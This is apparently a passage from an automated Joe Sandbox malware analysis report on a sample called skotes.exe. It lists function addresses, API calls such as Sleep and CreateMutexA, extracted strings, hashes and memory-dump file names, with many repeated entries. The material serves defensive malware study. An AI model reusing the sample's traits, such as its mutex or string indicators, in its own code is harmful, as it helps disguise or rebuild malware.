Opcode ID: f252e91c6e501cb9e31f7eba9bcdf3cf42de09203257f8cd84fbfbb8b42fdb38
Instruction ID: 83c89960eb7b0ca7588664ae57b6d67bf11253067a31ec143751b88f8c289be0
Opcode Fuzzy Hash: f252e91c6e501cb9e31f7eba9bcdf3cf42de09203257f8cd84fbfbb8b42fdb38
Instruction Fuzzy Hash: A82137327292019BFB18EF68ECCD76CB7A6EBC1310F24421EE419976D1DB7559A08712

Function 0028A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: aad46f4c422c54045e628cb3f5f09e6be7a9af8fbfde2694bc4986426dce05d6
Instruction ID: 39277f90e635bf7abe0b5d784f48909aedf1183c67da3e2601efc4f99b58a0a4
Opcode Fuzzy Hash: aad46f4c422c54045e628cb3f5f09e6be7a9af8fbfde2694bc4986426dce05d6
Instruction Fuzzy Hash: 36216D3537B1019AFB24BBA8989E77DB3529F81300F24091BE549D72C1DF7988B18763

Function 0028A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 9d8de86181c6b1a342817ae6c1fd3084cc01b99235407540d380bae6189d1a86
Instruction ID: a267aed408b7078f3f2741a12cdcacc7e44d6bdcb41fa68beb064c567fe1cd4d
Opcode Fuzzy Hash: 9d8de86181c6b1a342817ae6c1fd3084cc01b99235407540d380bae6189d1a86
Instruction Fuzzy Hash: 3D216732765200ABFB08EB68EC8D76CB7A6DB81310F24421FE409976D0CF7559A08752

Non-executed Functions

Function 002BCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002BCC66

Strings

v+, xrefs: 002BCBE1

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v+
API String ID: 3213747228-837333932
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 6e17eb706997620d35f2c3ba293bb39c89e84a28b68a6eeae4de6ac2fae4d127
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 9CB137329242879FDB15CF28C881BEEBFE5EF55380F34816AE855EB241D6749D11CB60

Function 00282EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00282F5F
__Mtx_unlock.LIBCPMT ref: 00282FCC
__Cnd_broadcast.LIBCPMT ref: 00282FE3
__Mtx_unlock.LIBCPMT ref: 002830F5
__Mtx_unlock.LIBCPMT ref: 0028319B

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 9d25b7cb9f7a2b16b58bb2dce373d5a5f115b06b654f448fe267c6ac3c796c76
Instruction ID: 112d0cf37d75dd4b46c86330a806906a59e0a15a438ba625cbec2dcb30d55f39
Opcode Fuzzy Hash: 9d25b7cb9f7a2b16b58bb2dce373d5a5f115b06b654f448fe267c6ac3c796c76
Instruction Fuzzy Hash: E1A1F374A22206DFDF11EF64C94875AB7F8FF15B10F148129E819D7681EB31EA24CB91

Function 0029BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0029BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BBE4
_xtime_get.LIBCPMT ref: 0029BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BC13

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 8b8e0c7ce038e242f54ddd884d57e56231eeb65accd09c539e6e45a1097cba46
Instruction ID: 7bc96e9f79f538ea252945ceaef98bd0ce9d82d2076a0d685ad63c96f145f7ee
Opcode Fuzzy Hash: 8b8e0c7ce038e242f54ddd884d57e56231eeb65accd09c539e6e45a1097cba46
Instruction Fuzzy Hash: 98212F71E11119AFDF01EFA4DD859BEB7B9EF48710F10002AF901A72A1DB309D119FA0

Function 002BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002BF3A3

Strings

8"., xrefs: 002BF44B
`'., xrefs: 002BF375

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8".$`'.
API String ID: 3903695350-1407274480
Opcode ID: 6755b50375d7994ec020cae990b4d7e1858003dd11be026a22aa0cf945586a50
Instruction ID: b84be2d3ef211ad3324ae835c777a2c2012b2822b62d15c17639b6d5b4992752
Opcode Fuzzy Hash: 6755b50375d7994ec020cae990b4d7e1858003dd11be026a22aa0cf945586a50
Instruction Fuzzy Hash: 7F317A31620342EFEB60AE39DE45BDBB3E8EF00392F148469E045D7595DE71ACA08B21

Analysis Process: skotes.exePID: 1708, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.1%
Total number of Nodes:	1175
Total number of Limit Nodes:	90

Executed Functions

Function 0028E530 Relevance: 25.5, APIs: 2, Strings: 12, Instructions: 998
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WTs=, xrefs: 002905CA
9c9aa5, xrefs: 0028FB8E
GnNoc2Hc, xrefs: 0028E56C
246122658369, xrefs: 0028F737, 0028FA14, 002905E7, 0029099A
L1., xrefs: 0028F7E5
MGE+, xrefs: 0028E821
#, xrefs: 00290624
WTw=, xrefs: 0029097D
111, xrefs: 0028F7A0
UA==, xrefs: 0028EB0F, 0028ED56
MQ==, xrefs: 0028E592
WDw=, xrefs: 0028F71D, 0028F9FA

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
